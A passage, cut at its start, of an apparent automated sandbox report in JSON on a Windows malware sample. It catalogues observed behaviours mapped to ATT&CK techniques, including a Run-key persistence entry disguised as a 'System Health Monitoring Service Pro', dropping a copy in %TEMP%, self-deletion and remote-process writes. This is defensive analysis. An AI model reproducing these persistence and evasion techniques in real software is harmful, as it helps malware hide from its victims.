\"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" queries volume information of \"C:\\\" at 00000000-00005880-0000010C-213738\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-256364\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005860-0000010C-1888751", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" queries volume information of \"C:\\\" at 00000000-00005880-0000010C-213738\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-256364\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005860-0000010C-1888751", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000029006861290063612900000000000000000000002600000000019cdd22000000000000eb220095e12877a13c1700feffffff435c2c7750592c77aa000000b8000000626129006061290024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c2b7760d83e75ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed2c778a612900a06a02758600000024df22005ce322000000000086008800a06a027524df2200916c02758a612900a06a0275a06a027594e3220002020000 (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005880)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000007300a81c7300a31c7300000000000000000000007000000000019cdc22000000000000ea220095e1287755201700feffffff435c2c7750592c77aa000000b8000000a21c7300a01c730024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c2b7760d83e75ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed2c77ca1c7300a06a02758600000024de22005ce222000000000086008800a06a027524de2200916c0275ca1c7300a06a0275a06a027594e2220002020000 (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf002d77d6002d77c9c7197770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005880)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has a section named \".eh_fram\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" wrote 16136 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005880]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}